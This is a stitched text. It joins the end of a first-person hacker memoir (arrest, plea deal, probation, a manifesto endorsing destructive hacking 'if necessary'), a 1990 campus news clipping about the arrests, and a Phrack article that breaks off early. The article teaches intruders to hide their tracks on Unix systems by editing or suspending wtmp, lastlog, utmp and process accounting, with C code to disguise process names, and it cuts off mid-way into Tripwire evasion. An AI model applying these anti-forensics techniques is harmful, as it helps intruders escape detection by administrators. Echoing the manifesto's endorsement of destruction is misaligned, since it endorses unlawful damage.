Jeffery did not take the mug shots.  A photographer took them.
Therefore, it went smoothly.

Finally, Wayne presented me with an arrest warrant affidavit, evidently
written by Jeffery Jones.  A paragon of incompetence, incapable of
performing the simplest task without assistance, Jeff had written an
eighteen-page arrest warrant affidavit which was a marvel of incoherence
and inaccuracy.  This document, with a list of corrections and emendations,
will appear in a separate article.

While reading the first five pages of this astounding document, I attempted
to maintain an air of solemnity.  However, by the sixth page, I was stifling
giggles.  By the seventh, I was chuckling out loud.  By the eighth page I
was laughing.  By the ninth page I was laughing loudly, and I finished the
rest of the document in gales of mirth.  Everyone in the room stared at me
as if I were insane.  This didn't bother me.  Most of my statements to the
police resulted in this sort of blank stare.  Even Dale looked as if
he thought I had cracked, but he understood when he saw his arrest
warrant affidavit, nearly identical to mine.

I simply was unable to take seriously that I had spent months worrying
about what kind of a case they had, when their best effort was this
farrago of absurdities.

They took us to Clifford Yorks, the District Magistrate, in separate
cars.  This time, we rode in the front seat, and two young recruits
were our chauffeurs.  Dale asked his driver if he could turn on the
siren.  The cop was not amused.

The only thing which struck me about Clifford Yorks was
that he had a remarkably large head.  It appeared as if it
had been inflated like a beach ball.

The magistrate briefly examined the arrest warrant affidavits,
nodded his vast head, and released us on our own recognizance,
in lieu of ten thousand dollars bail.  He seemed somewhat preoccupied.
We signed the papers and left.  The police offered to give
us a ride right to our house, but we said we'd settle for being
dropped off in town.

Being over a month in arrears for rent, we did not like the idea
of our landlord seeing us arrive in separate police cars; also,
our address was rather notorious, and other residents would be
greatly suspicious if they saw us with cops.

An arraignment was scheduled for a date months in the future.
The waiting game was to resume.


XIII.  Legal Counsel

Having been arrested, we were at last eligible for legal counsel.
We went to the yellow pages and started dialing.  We started with
the attorneys with colored half-page ads.  Even from those advertising
"Reasonable Rates," we received figures I will not quote for fear
of violating obscenity statutes.

Going to the quarter-page ads, then the red-lettered names, then the
schmucks with nothing but names, we received the same sort of numbers.
Finally talking to the _pro bono_ attorneys, we found that we were
entitled to a reduction in rates of almost fifty per cent.

This generosity brought the best price down to around three thousand
dollars, which was three thousand dollars more than we could afford.

So we contacted the public defender's office.

Friends told me that a five thousand dollar attorney is worse, even,
than a public defender; and that it takes at least twenty thousand
to retain an attorney with capable of winning anything but the most
open-and-shut criminal case.

After a certain amount of bureaucratic runaround, we were assigned two
attorneys.  One, Deborah Lux, was the Assistant Chief Public Defender;
the other, Dale's attorney, was Bradley Lunsford, a sharp, young
attorney who seemed too good to be true.

We discussed the case with our new attorneys, and were told that the
best action we could take to defend ourselves was to do nothing.

This is true.  Anything we had attempted in our own defense, with
the exception of contacting the complaining party, had been harmful
to our case.  Any discussions we had with the police were taped and
examined for anything incriminating.  A letter to the district
attorney was ignored entirely.

Do absolutely nothing without legal counsel.  Most legal counsel will
advise you to do nothing.  Legal counsel has more leverage than you do,
and can make binding deals with the police.  You can't.

We discussed possible defenses.

As none of the systems into which I had intruded had any sort of warning
against unauthorized access, this was considered a plausible defense.

The almost exclusive use of 'guest' accounts was also beneficial.

A more technical issue is the Best Evidence rule.  We wondered whether
a court would allow hardcopy as evidence, when the original document was
electronic.  As it happens, hardcopy is often admissible due to
loopholes in this rule, even though hardcopy is highly susceptible to
falsification by the police; and most electronic mail has no
built-in authentication to prove identity.

Still, without anything more damaging than electronic mail, a case
would be very difficult to prosecute.  However, with what almost
amounted to a taped confession, the chance of a conviction
was increased.

We went over the arrest warrant affidavit, and my corrections to it,
with a mixture of amusement and consternation.

"So what do you think of this?" asked Dale.

After a moment of thought, Deb Lux said:  "This is gibberish."

"I just had a case where a guy pumped four bullets into his brother-in-law,
just because he didn't like him, and the arrest warrant for that was two
pages long.  One and a half, really," said Brad.

"Does this help us, at all, that this arrest warrant is just demonstrably
false, that it literally has over a hundred mistakes in it?" I asked.

"Yeah, that could help," said Brad.

We agreed to meet at the arraignment.


XIV.  The Stairwells of Justice

The arraignment was a simple procedure, and was over in five minutes.
Prior to our arraignment, five other people were arraigned on charges
of varying severity, mainly such heinous crimes as smoking marijuana
or vandalism.

Dale stepped in front of the desk first.  He was informed of the charges
against him, asked if he understood them, and that was it.

I stepped up, but when the judge asked me whether I understood the charges,
I answered that I didn't, and that the charges were incomprehensible
to a sane human being.  I had hoped for some sort of response, but
that was it for me, too.

A trial date was set, once again months in advance.

A week before the date arrived, it was once again postponed.

During this week, we were informed that Dale's too good to be true
attorney, Brad Lunsford, had went over to the District Attorney's
office.  He was replaced by Dave Crowley, the Chief District Attorney,
a perpetually bitter, pock-faced older man with the demeanor and
bearing of an angry accountant.

Crowley refused to consider any of the strategies we had discussed
at length with Brad and Deb.  Dale was understandably irate at the
sudden change, as was I, for when Deb and I were attempting to discuss
the case he would interject rude comments.

Finally, after some particularly snide remark, I told him to fuck
off, or something similarly pleasant, and left.  Dale and I tried to
limit our dealings to Deb, and it was Deb who handled both of our
cases to the end, for which I thank God.

The day arrived.

We dressed quite sharply, Dale in new wool slacks and jacket.  I dressed
in a new suit as well, and inserted a carnation in my buttonhole as
a gesture of contempt for the proceedings.

Dale looked so sharp that he was mistaken for an attorney twice.  I
did not share this distinction, but I looked sharp enough.  I had
shaved my beard a month previously after an error in trimming,
so I looked presentable.

We realized that judges base their decisions as much on your appearance
as on what you say.  We did not intend to say anything, so
appearance was of utmost importance.

We arrived at about the same time as at least thirty assorted computer
security professionals, police, witnesses and ancillary court personnel.
Dhamir Mannai and Richard Devon were there as well, and we exchanged
greetings.  Richard Devon was optimistic about the outcome, as was
Dhamir Mannai.  The computer security people gathered into a tight,
paranoid knot, and Richard Devon and Dhamir Mannai stood about ten
feet away from them, closer to us than to them.  Robert Owens,
Angela Thomas, Bryan Jensen, and Dan Ehrlich were there, among others.
They seemed nervous and ill-at-ease in their attempt at formal dress.
Occasionally, one or another would glare at us, or at Devon and Mannai.
I smiled and waved.

A discussion of some sort erupted among the computer security people,
and a bailiff emerged and requested that they be quiet.  The second time this
was necessary, he simply told them to shut up, and told them to take
their discussion to the stairwells.  Dale and I had known of the noise
policy for some time, and took all attorney-client conferences to the
stairwells, which were filled at all times with similar conferences.
It seemed that all the hearings and motions were just ceremonies without
meaning; all the decisions had been made, hours before, in the stairwells
of justice.

Finally Deb Lux arrived, with a sheaf of documents, and immediately left,
saying that she would return shortly.  A little over twenty minutes later,
she returned to announce that she had struck a deal with Eileen Tucker,
the Assistant District Attorney.

In light of the garbled nature of the police testimony, the spuriousness
of the arrest warrant affidavit, the hostility of their main witness,
Dhamir Mannai, and the difficulty of prosecuting a highly technical case,
the Office of the District Attorney was understandably reluctant to
prosecute us.

I was glad not to have to deal with Eileen Tucker, a woman affectionately
nicknamed by other court officials "The Wicked Witch of the West."
With her pallid skin, and her face drawn tightly over her skull as
if she had far too much plastic surgery, this seemed an adequately
descriptive name, both as to appearance and personality.

The deal was Advanced Rehabilitative Disposition, a pre-trial diversion in
which you effectively receive probation and a fine, and charges are dismissed,
leaving you with no criminal record.  This is what first-time
drunk drivers usually receive.

It is essentially a bribe to get the cops off your back.

The fines were approximately two thousand dollars apiece, with Dale
arbitrarily receiving a fine two hundred dollars greater than mine.

After a moment of thought, we decided that the fines were too large.
We turned down the deal, and asked her if she could get anything
better than that.

After a much shorter conference she returned, announcing
that the fines had been dropped by about a third.  Still unsatisfied,
but realizing that the proceedings, trial, jury selection, delays,
sentencing, motions of discovery and almost limitless writs and
affidavits and appeals would take several more months, we agreed
to the deal.  It was preferable to more hellish legal proceedings.

We discussed the deal outside with Richard Devon; Dhamir Mannai had left,
having pressing engagements both before and after his testimony had
been scheduled.  We agreed that a trial would probably have resulted
in an eventual victory, but at what unaffordable cost?  We had no
resources or time for a prolonged legal battle, and no acceptable
alternative to a plea-bargain.


XV.  The End?  Of Course Not; There Is No End

This, we assumed incorrectly, was the end.  There was still a date
for sentencing, and papers to be signed.

Nevertheless, this was all a formality, and weeks distant.  There
was time to prepare for these proceedings.  The hounds of spring
were on winter's traces.  Dale and I hoped to return to what was
left of our lives, and to enjoy the summer.

This hope was not to be fulfilled.

For, while entering the Electronic Music Lab one fine spring night,
Andy Ericson [*], a locally-renowned musician, was halted by the
University Police outside the window, as he prepared to enter.
We quickly explained that we were authorized to be present, and
immediately presented appropriate keys, IDs and other evidence that
we were authorized to be in the Lab.

Nevertheless, more quickly than could be imagined, the cops grabbed
Andy and slammed him against a cruiser, frisking him for
weapons.  They claimed that a person had been sighted carrying a
firearm on campus, and that they were investigating a call.

No weapons were discovered.  However, a small amount of marijuana
and a tiny pipe were found on him.  Interestingly, the police log
in the paper the following day noted the paraphernalia bust, but
there was no mention of any person carrying a firearm on campus.

Andy, a mathematician pursuing a Master's Degree, was performing
research in a building classified Secret, and thus required a security
clearance to enter the area where he performed his research.

His supervisor immediately yanked his security clearance, and
this greatly jeopardized his chances of completing his thesis.

This is, as with my suspicions of wiretapping, an incident in which
circumstantial evidence seems to justify my belief that the
police were, even then, continuing surveillance on my friends and
on me.  However, as with my wiretapping suspicions, there is
a maddening lack of substantial evidence to confirm my belief
beyond a reasonable doubt.

Still, the police continued their series of visits to the Lab, under
one ruse or another.  Jeffery Jones, one night, threatened to arrest
Dale for being in the Electronic Music Lab, though he had been informed
repeatedly that Dale's access was authorized by the School of Music.  Dale
turned over his keys to Police Services the following day, resenting it
bitterly.

This, however, was not to be a victory for the cops, but a crushing
embarrassment.  While their previous actions had remained at least
within the letter of the law and of university policy, this was
egregious and obvious harassment, and was very quickly quashed.

Bob Wilkins, the supervisor of the Electronic Music Lab; Burt Fenner,
head of the Electronic Music division; and the Dean of the College of
Arts and Architecture immediately drafted letters to the University
Police objecting to this illegal action; as it is the professors and
heads of departments who authorize keys, and not the University
Police.  The keys were returned within three days.

However, Jeffery was to vent his impotent rage in repeated visits to
the Lab at late hours.  On a subsequent occasion, he again threatened
to arrest Dale, without providing any reason or justification for it.

The police, Jeffery and others, always had some pretext for these visits,
but the fact that these visits only occurred when Dale was
present in the Lab, and that they visited no one else, seems to be
solid circumstantial evidence that they were more than routine
checkups.

Once the authorities become interested in you, the file is never
closed.  Perhaps it will sit in a computer for ten or twenty years.
Perhaps it will never be accessed again.  However, perhaps some
day in the distant future the police will be investigating some
unrelated incident, and will once again note your name.  You were
in the wrong building, or talked to the wrong person.  Suddenly,
their long-dormant interest in you has reawakened.  Suddenly, they
once again want you for questioning.  Suddenly, once again, they
pull your life out from under you.

This is the way democracies die, not by revolution or coups d'etat,
not by the flowing of blood in the streets like water, as historical
novelists so quaintly write.  Democracies die by innumerable papercuts.
Democracies die by the petty actions of petty bureaucrats who, like
mosquitoes, each drain their little drop of life's blood until none
is left.


XVI.  Lightning Always Strikes the Same Place Twice

One day, Dale received in the mail a subpoena, which informed him that
his testimony was required in the upcoming trial of Ron Gere, who
had moved to Florida.  The cops had charged him with criminal
conspiracy in the creation of the Huang account at the Engineering
Computer Lab.

Now, not only was I guilty of being used as a weapon against a
friend, but also guilty of this further complication, that the
police were to use a friend of mine as a weapon against yet
another friend.

It is interesting to note the manner in which the police use
betrayal, deceit and infamous methods to prosecute crime.

It is especially interesting to note the increased use of
such methods in the prosecution of crimes with no apparent victim.
Indeed, in this specific case, the only victim with a demonstrable
loss testified against the police and for the accused.

Dale resolved to plead the Fifth to any question regarding Ron,
and to risk contempt of court by doing so, rather than be used
in this manner.

This was not necessary.  As it happened, Ron was to drive well over
two thousand miles simply to sign a paper and receive ARD.  The three
of us commiserated, and then Ron was on his way back to Florida.


XVII.  Sentencing

Dale and I reported to the appropriate courtroom for sentencing.  In
the hall, a young man, shackled and restrained by two police officers,
was yelling:  "I'm eighteen, and I'm having a very bad day!"  The cops
didn't bat an eye as they dragged him to the adjoining prison.

We sat.

The presiding judge, the Hon. David C. Grine, surveyed with evident
disdain a room full of criminals like us.  Deborah Lux was there, once
again serving as counsel.  David Crowley was mercifully absent.

The judge briefly examined each case before him.  For each case, he announced
the amount of the fine, the time of probation, and banged his gavel.
Immediately before he arrived at our case, he looked at a man directly to
our left.  Instead of delivering the usual ARD sentence, he flashed a
sadistic grin and said:  "Two years jail."  Dealing marijuana was the crime.
The man's attorney objected.  The judge said:  "Okay, two years, one
suspended."  The attorney, another flunky from the public defender's
office, sat down again.  Two cops immediately dragged the man from the
courtroom to take him to jail.

I noted that practically everyone in the room was poor,
and those with whom I spoke were all uneducated.  DUI was the
most common offense.

Judge Grine came to our case, announced the expected sentence,
and we reported upstairs to be assigned probation officers.  I was
disgusted with myself for having agreed to this arrangement, and
perhaps this was why I was surly with the probation officer, Thomas
Harmon.  This earned me a visit to a court-appointed psychiatrist,
to determine if I were mentally disturbed or on drugs.

That I was neither was satisfied by a single interview, and no
drug-testing was necessary; for which I am grateful, for I would
have refused any such testing.  Exercising this Fifth Amendment-
guaranteed right is, of course, in this day considered to be
an admission of guilt.  The slow destruction of this right began
with the government policy of "implied consent," by which one
signs over one's Fifth Amendment rights against self-incrimination
by having a driver's license, allowing a police officer to pull
you over and test your breath for any reason or for no reason
at all.

I later apologized to Thomas Harmon for my rudeness, as he had
done me no disservice; indeed, a probation officer is, at least,
in the business of keeping people out of jail instead of putting
them there; and his behavior was less objectionable than that of
any other police officer involved in my case.

Very shortly thereafter, realizing that I knew a large number
of the local police on a first-name basis, I left the area, with the
stated destination of Indiana.  I spent the next two years travelling,
with such waypoints as New Orleans, Denver, Seattle and Casper, Wyoming;
and did not touch a computer for three years, almost having a horror
of them.

I did not pay my fine in the monthly installments the court demanded.
I ignored virtually every provision of my probation.  I did not remain
in touch with my probation officer, almost determined that my absence
should be noticed.  I did a lot of drugs, determined to obliterate all
memory of my previous life.  In Seattle, heroin was a drug of choice,
so I did that for a while.

Finally, I arrived at my stated destination, Indiana, with only about
three months remaining in my probation, and none of my fines paid.  Dale,
without my knowledge, called my parents and convinced them to pay the
fine.

It took me a few days of thought to decide whether or not to accept
their generous offer; I had not thought of asking them to pay the fine,
sure that they would not.  Perhaps I had done them a disservice in so
assuming, but now I had to decide whether to accept their help.

If my fines were not paid, my ARD would be revoked, and a new trial
date would be set.  I was half determined to return and fight this
case, still ashamed of having agreed to such a deal under duress.
However, after discussing it at exhaustive length with everyone I
knew, I came to the conclusion that to do so would be foolish and quixotic.
Hell, I thought, Thoreau did the same thing in a similar circumstance;
why shouldn't I?

I accepted my parents' offer.  Three months later, I received a letter in
the mail announcing that the case had been dismissed and my records
expunged, with an annotation to the effect that records would be
retained only to determine eligibility for any future ARD.  I believe
this to the same degree in which I believe that the NSA never
performs surveillance on civilians.  I have my doubts that the FBI
eliminated all mention of me from their files.  I shall decide after
I file a Freedom of Information Act request and receive a reply.

I now have a legitimate Internet account and due to my experiences
with weak encryption am a committed cypherpunk and Clipper Chip
proposal opponent.

What is the moral to this story?

Even now, when I have had several years to gain distance and perspective,
there does not seem to be a clear moral; only several pragmatic
lessons.

I became enamored of my own brilliance, and arrogantly sure that
my intelligence was invulnerability.  I assumed my own immortality,
and took a fall.  This was not due to the intelligence of my
adversaries, for the stupidity of the police was marvellous to
behold.  It was due to my own belief that I was somehow infallible.

Good intentions are only as good as the precautions taken to ensure
their effectiveness.

There is always a Public Enemy Number One.  As the public's fickle
attention strays from the perceived menace of drug use, it will latch
on to whatever new demon first appears on television.  With the
growing prevalence of hatchet jobs on hackers in the public media,
it appears that hackers are to be the new witches.

It is advisable, then, that we avoid behavior which would tend to
confirm the stereotypes.  For every Emmanuel Goldstein or R. U.
Sirius in the public eye, there are a dozen Mitnicks and Hesses;
and, alas, it is the Mitnicks and Hesses who gain the most attention.
Those who work for the betterment of society are much less interesting
to the media than malicious vandals or spies.

In addition, it is best to avoid even the appearance of dishonesty
in hacking, eschewing all personal gain.

Phreaking or hacking for personal gain at the expense of others is
entirely unacceptable.  Possibly bankrupting a small company through
excessive telephone fraud is not only morally repugnant, but also puts
money into the coffers of the monopolistic phone companies that we despise.

The goal of hacking is, and always has been, the desire for full
disclosure of that information which is unethically and illegally
hidden by governments and corporations; add to that a dash of
healthy curiosity and a hint of rage, and you have a solvent capable
of dissolving the thickest veils of secrecy.  If destructive means
are necessary, by all means use them; but be sure that you are not
acting from hatred, but from love.

The desire to destroy is understandable, and I sympathize with it;
anyone who can not think of a dozen government bodies which would be
significantly improved by their destruction is probably too
dumb to hack in the first place.  However, if that destruction merely
leads to disproportionate government reprisals, then it is not only
inappropriate but counterproductive.

The secrecy and hoarding of information so common in the hacker
community mirrors, in many respects, the secrecy and hoarding of
information by the very government we resist.  The desired result
is full disclosure.  Thus, the immediate, anonymous broadband
distribution of material substantiating government and corporate
wrongdoing is a mandate.

Instead of merely collecting information and distributing it
privately for personal amusement, it must be sent to newspapers,
television, electronic media, and any other means of communication
to ensure both that this information can not be immediately
suppressed by the confiscation of a few bulletin board systems
and that our true motives may be discerned from our public and
visible actions.

Our actions are not, in the wake of Operation Sun-Devil and the
Clipper Chip proposal, entirely free.  The government has declared
war on numerous subsections of its own population, and thus has
defined the terms of the conflict.  The War on Drugs is a notable
example, and we must ask what sort of a government declares war
on its own citizens, and act accordingly.

Those of us who stand for liberty must act while we still can.

It is later than we think.


             "In Germany they first came for the Communists and
              I didn't speak up because I wasn't a Communist.
              Then they came for the Jews, and I didn't speak up
              because I wasn't a Jew.  Then they came for the
              trade unionists, and I didn't speak up because I
              wasn't a trade unionist.  Then they came for the
              Catholics, and I didn't speak up because I was a
              Protestant.  Then they came for me--and by that
              time no one was left to speak up."  Martin Niemoeller

              "They that can give up essential liberty to obtain
               a litle temporary safety deserver neither
               liberty nor safety."  Benjamin Franklin

---------
APPENDIX A

[From cert-clippings]

Date: Sat, 10 Mar 90 00:22:22 GMT
From: thomas@shire.cs.psu.edu (Angela Marie Thomas)
Subject: PSU Hackers thwarted

The Daily Collegian  Wednesday, 21 Feb 1990

Unlawful computer use leads to arrests
ALEX H. LIEBER, Collegian Staff Writer

Two men face charges of unlawful computer use, theft of services in a
preliminary hearing scheduled for this morning at the Centre County Court of
Common Pleas in Bellefonte.  Dale Garrison, 111 S. Smith St., and Robert W.
Clark, 201 Twin Lake Drive, Gettysburg, were arrested Friday in connection with
illegal use of the University computer system, according to court records.
Garrison, 36, is charged with the theft of service, unlawful computer use
and criminal conspiracy.  Clark, 20, is charged with multiple counts of
unlawful computer use and theft of service.  [...]

Clark, who faces the more serious felony charges, allegedly used two computer
accounts without authorization from the Center of Academic Computing or the
Computer Science Department and, while creating two files, erased a file from
the system.  [...]  When interviewed by University Police Services, Clark
stated in the police report that the file deleted contained lists of various
groups under the name of "ETZGREEK."  Clark said the erasure was accidental,
resulting from an override in the file when he tried to copy it over onto a
blank file.  According to records, Clark is accused of running up more than
$1000 in his use of the computer account.  Garrison is accused of running up
more than $800 of computer time.

Police began to investigate allegations of illegal computer use in November
when Joe Lambert, head of the university's computer department, told police a
group of people was accessing University computer accounts and then using those
accounts to gain access to other computer systems.  Among the systems accessed
was Internet, a series of computers hooked to computer systems in industry,
education and the military, according to records.

The alleged illegal use of the accounts was originally investigated by a
Computer Emergency Response Team at Carnegie-Mellon University, which assists
other worldwide computer systems in investigating improper computer use.

Matt Crawford, technical contact in the University of Chicago computer
department discovered someone had been using a computer account from Penn State
to access the University of Chicago computer system.




 

--------------------------------------------------------------------------------


 
                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 14 of 27

#!/bin/sh
# Playing Hide and Seek, Unix style.
# By Phreak Accident
#
# A "how-to" in successfully hiding and removing your electronic footprints
# while gaining unauthorized access to someone else's computer system (Unix in
# this case).


# Start counting ..

  Hmm.  Sucks don't it? Breaking into a system but only to have your access
cut off the next day.  Right before you had the chance to download that 2
megabyte source code file you have been dying to get all year.

  Why was the access cut?  Damn, you forgot to nuke that .rhosts file that
you left in the root directory.  Or maybe it was the wtmp entries you didn't
bother to edit.  Or perhaps the tcp_wrapper logs that you didn't bother to
look for.  Whatever it was, it just screwed your access and perhaps, just
got you busted.


----  Simulated incident report follows:

From: mark@abene.com (Mark Dorkenski)
Message-Id: <9305282324.AA11445@jail.abene.com>
To: incident-report@cert.org
Subject: Cracker Breakin
Status: RO

To whom it may concern,

   Last night 2 of our machines were penetrated by an unauthorized
user.  Apparently the cracker (or crackers) involved didn't bother
to clean up after they left.

   The following are logs generated from the time the break-in
occurred.

[/usr/adm/wtmp]:

oracle    ttyp1    192.148.8.15     Tue May 11 02:12 - 04:00  (02:12)
sync      ttyp2    192.148.8.15     Tue May 11 01:47 - 01:47  (00:00)
robert    console                   Mon May 10 06:00 - 04:15  (22:14)
reboot    ~                         Mon May 10 05:59
shutdown  ~                         Sun May  9 11:04

[/usr/adm/messages]:

May  11 02:02:54 abene.com login: 3 LOGIN FAILURES FROM 192.148.8.15
May  11 02:00:32 abene.com login: 4 LOGIN FAILURES FROM 192.148.8.15

[/usr/adm/pacct]:

ls         -     oracle   ttyp1      0.00 secs Tue May  2 19:37
cat        -     oracle   ttyp1      0.00 secs Tue May  2 19:37
ls         -     oracle   ttyp1      0.00 secs Tue May  2 19:37
ls         -     oracle   ttyp1      0.00 secs Tue May  2 19:37
rdist      -     root     ttyp1      0.00 secs Tue May  2 19:37
sh         -     root     ttyp0      0.00 secs Tue May  2 19:37
ed         -     root     ttyp0      0.00 secs Tue May  2 19:37
rlogin     -     root     ttyp0      0.00 secs Tue May  2 19:37
ls         -     root     ttyp0      0.00 secs Tue May  2 19:37
more       -     root     ttyp0      0.00 secs Tue May  2 19:34


We have found and plugged the areas of vulnerability and have restored
original binaries back to the system.  We have already informed the proper
authorities of the breakin, including the domain contact at the remote
host in question.

Can you please relay any information regarding incident reports in our
area?


      Mark Dorkenski
      Network Operations

----  End of incident report

  Hey, it's human nature to be careless and lazy.  But, when you're a hacker,
and you're illegally breaking into computer systems this isn't a luxury that
you can afford.  Your efforts in penetrating have to be exact, concise,
sharp, witty and skillful.  You have to know when to retreat, run, hide,
pounce or spy.  Let us put it this way, when you get your feet muddy and
walk on new carpet without cleaning it up, you're gonna get spanked.

  I can't tell you how many times I've see a hacker break into a system and
leave their muddy footprints all over the system.  Hell, a quarter of the
hosts on the Internet need to be steam-cleaned.

  This is sad.  Especially since you could have had the ability to do the
washing yourself.  Why bother cracking systems if you leave unauthorized login
messages on the console for the administrators?  Beats me.

  This article is about hiding your access--the little tricks of the trade
that keep you unnoticed and hidden from that evil bastard, the system
administrator.

  I should probably start by explaining exactly where common accounting/log
files are kept and their roles in keeping/tracking system information.

# Drinking jolt and jerking the logs

  Syslog(3),  The "Big Daddy" of logging daemons, is the master of all system
accounting and log reporting.  Most system components and applications
depend on syslogd to deliver the information (accounting, errors, etc.) to
the appropriate place.  Syslog (syslogd) reads a configuration file
(/etc/syslog.conf) on startup to determine what facilities it will support.

  Syslog ususally has the following facilities and priorities:

  Facilities: kern user mail daemon auth syslog lpr news uucp
  Priorities: emerg alert crit err warning notice info debug

  Facilities are the types of accounting that occur and priorities are the
level of urgency that the facilities will report.  Most facilities are
divided and logged into separate accounting files.  The common being daemon,
auth, syslog, and kern.

  Priorities are encoded as a facility and a level.  The facility usually
describes the part of the system generating the message. Priorities are
defined in <sys/syslog.h>.

  In order to by-pass or suspend system accounting it is necessary to
understand how it works.  With syslog, it is important to know how to
read and determine where accounting files are delivered.  This entails
understanding how syslog configures itself for operation.

# Reading and understanding /etc/syslog.conf.

  Lines in the configuration file have a selector to determine the
message priorities to which the line applies and an action.  The action
fields are separated from the selector by one or more tabs.

  Selectors are semicolon separated lists of priority specifiers.  Each
priority has a facility describing the part of the system that generated
the message, a dot, and a level indicating the severity of the message.
Symbolic names could be used.  An asterisk selects all facilities.  All
messages of the specified level or higher (greater severity) are
selected. More than one facility may be selected using commas to separate
them.  For example:

   *.emerg;mail,daemon.crit

  selects all facilities at the emerg level and the mail and daemon facil-
ities at the crit level.

  Known facilities and levels recognized by syslogd are those listed in
syslog(3) without the leading ``LOG_''. The additional facility ``mark''
has a message at priority LOG_INFO sent to it every 20 minutes (this may be
changed with the -m flag).  The ``mark'' facility is not enabled by a
facility field containing an asterisk.  The level ``none'' may be
used to disable a particular facility.  For example,

   *.debug;mail.none

   Sends all messages except mail messages to the selected file.

   The second part of each line describes where the message is to be logged
if this line is selected.  There are four forms:

   o A filename (beginning with a leading slash).  The file
 will be opened in append mode.

   o A hostname preceded by an at sign (``@'').  Selected
 messages are forwarded to the syslogd on the named host.

   o A comma separated list of users.  Selected messages are
 written to those users if they are logged in.

   o An asterisk.  Selected messages are written to all
 logged-in users.

   For example, the configuration file:

   kern,mark.debug /dev/console
   *.notice;mail.info /usr/spool/adm/syslog
   *.crit               /usr/adm/critical
   kern.err  @phantom.com
   *.emerg  *
   *.alert  erikb,netw1z
   *.alert;auth.warning ralph

   logs all kernel messages and 20 minute marks onto the system
console, all notice (or higher) level messages and all mail system messages
except debug messages into the file /usr/spool/adm/syslog, and all critical
messages into /usr/adm/critical; kernel messages of error severity or
higher are forwarded to ucbarpa.  All users will be informed of any
emergency messages, the users ``erikb'' and ``netw1z''  will be informed of
any alert messages, or any warning message (or higher) from the authorization
system.

   Syslogd creates the file /etc/syslog.pid, if possible, containing a
single line with its process id; this is used to kill or reconfigure
syslogd.

# System login records

  There are there basic areas (files) in which system login information is
stored.  These areas are:

  /usr/etc/wtmp
  /usr/etc/lastlog
  /etc/utmp

  The utmp file records information about who is currently using the
system.  The file is a sequence of entries with the following structure
declared in the include file (/usr/include/utmp.h):

            struct utmp {
                  char    ut_line[8];             /* tty name */
                  char    ut_name[8];             /* user id */
                  char    ut_host[16];            /* host name, if remote */
                  long    ut_time;                /* time on */
            };

  This structure gives the name of the special file associated
with the user's terminal, the user's login name, and the
time of the login in the form of time(3C).  This will vary from platform
to platform.  Since Sun Microsystems ships SunOs with a world writable
/etc/utmp, you can easily take yourself out of any who listing.

  The wtmp file records all logins and logouts.  A null username
indicates a logout on the associated terminal.  Furthermore, the terminal
name `~' indicates that the system was rebooted at the indicated time;
the adjacent pair of entries with terminal names `|' and `{' indicate the
system maintained time just before and just after a date command has
changed the system's idea of the time.

  Wtmp is maintained by login(1) and init(8).  Neither of these programs
creates the file, so if it is removed or renamed record-keeping is turned off.
Wtmp is used in conjunction with the /usr/ucb/last command.

  /usr/adm/lastlog is used by login(1) for storing previous login dates, times,
and connection locations.  The structure for lastlog is as follows:

            struct lastlog {
                  time_t  ll_time;
                  char    ll_line[8];
                  char    ll_host[16];
            };

  The structure for lastlog is quite simple.  One entry per UID, and it is
stored in UID order.

  Creating a lastlog and wtmp editor is quite simple.  Example programs are
appended at the end of this file.

# System process accounting

  Usually, the more security-conscience systems will have process accounting
turned on which allows the system to log every process that is spawned.
/usr/adm/acct or /usr/adm/pacct are the usual logfiles that store the
accounting data.  These files can grow quite large as you can imagine, and
are sometimes shrunk by other system applications and saved in a compressed
format as /usr/adm/savacct or something similar.

  Usually, if the accounting file is there with a 0 byte length then you can
rest assured that they are not keeping process accounting records.  If they
are however, there are really only two methods of hiding yourself from this
form of accounting.  One, you can suspend or stop process accounting (
which is usually done with the "accton" command) or you can edit the existing
process logfile and "wipe" your incriminating records.

  Here is the common structure for the process accounting file:

  struct  acct
  {
        char    ac_comm[10];            /* Accounting command name */
        comp_t  ac_utime;               /* Accounting user time */
        comp_t  ac_stime;               /* Accounting system time */
        comp_t  ac_etime;               /* Accounting elapsed time */
        time_t  ac_btime;               /* Beginning time */
        uid_t   ac_uid;                 /* Accounting user ID */
        gid_t   ac_gid;                 /* Accounting group ID */
        short   ac_mem;                 /* average memory usage */
        comp_t  ac_io;                  /* number of disk IO blocks */
        dev_t   ac_tty;                 /* control typewriter */
        char    ac_flag;                /* Accounting flag */
   };

  It is extremely tricky to remove all of your account records since if you
do use a program to remove them, the program that you run to wipe the
records will still have a process that will be appended to the logfile
after it has completed.

  An example program for removing process accounting records is included
at the end of this article.

  Most sysadmins don't pay real attention to the process logs, since they
do tend to be rather large and grow fast.  However, if they notice that a
break-in has occurred, this is one of the primary places they will look for
further evidence.

  On the other hand, for normal system monitoring, you should be more worried
about your "active" processes that might show up in a process table listing
(such as ps or top).

  Most platforms allow the general changing of the process name without having
any kind of privileges to do so.  This is done with a simple program as noted
below:

  #include <stdio.h>
  #include <string.h>

  int main(argc, argv)
      int argc;
      char **argv;
  {
    char *p;

    for (p = argv[0]; *p; p++)
        *p = 0;

    strcpy(argv[0], "rn");

    (void) getchar ();  /* to allow you to see that ps reports "rn" */
    return(0);
  }

  Basically, this program waits for a key-stroke and then exits.  But,
while it's waiting, if you were to lookup the process it would show the name
as being "rn".  You're just actually re-writing the argument list of the
spawned process.  This is a good method of hiding your process or program
names ("crack", "hackit", "icmpnuker").  Its a good idea to use this method
in any "rogue" programs you might not want to be discovered by a system
administrator.

  If you cant corrupt your process arguments, rename your program to something
that at least looks normal on the system.  But, if you do this, make sure that
you don't run the command as "./sh" or "./ping" .. Even this looks suspicious.
Put your current path in front of your PATH environment variable and avoid
this mistake.

# Tripping the wire

 That little piss-ant up at Purdue thinks he has invented a masterpiece..
I'll let his words explain what "Tripwire" is all about.  Then, i'll go over
some brief flaws in tripwire and how to circumvent it.

---- Tripwire README Introduction

  1.0.  Background
  ================

     With the advent of increasingly sophisticated and subtle
 account break-ins on Unix systems, the need for tools to aid in
 the detection of unauthorized modification of files becomes
 clear.  Tripwire is a tool that aids system administrators and
 users in monitoring a designated set of files for any changes.
 Used with system files on a regular (e.g., daily) basis, Tripwire
 can notify system administrators of corrupted or tampered files,
 so damage control measures can be taken in a timely manner.

  1.1.  Goals of Tripwire
  =======================


     Tripwire is a file integrity checker, a utility that compares
 a designated set of files against information stored in a
 previously generated database.  Any differences are flagged and
 logged, and optionally, a user is notified through mail.  When
 run against system files on a regular basis, any changes in
 critical system files will be spotted -- and appropriate damage
 control measures can be taken immediately.  With Tripwire, system
 administrators can conclude with a high degree of certainty that
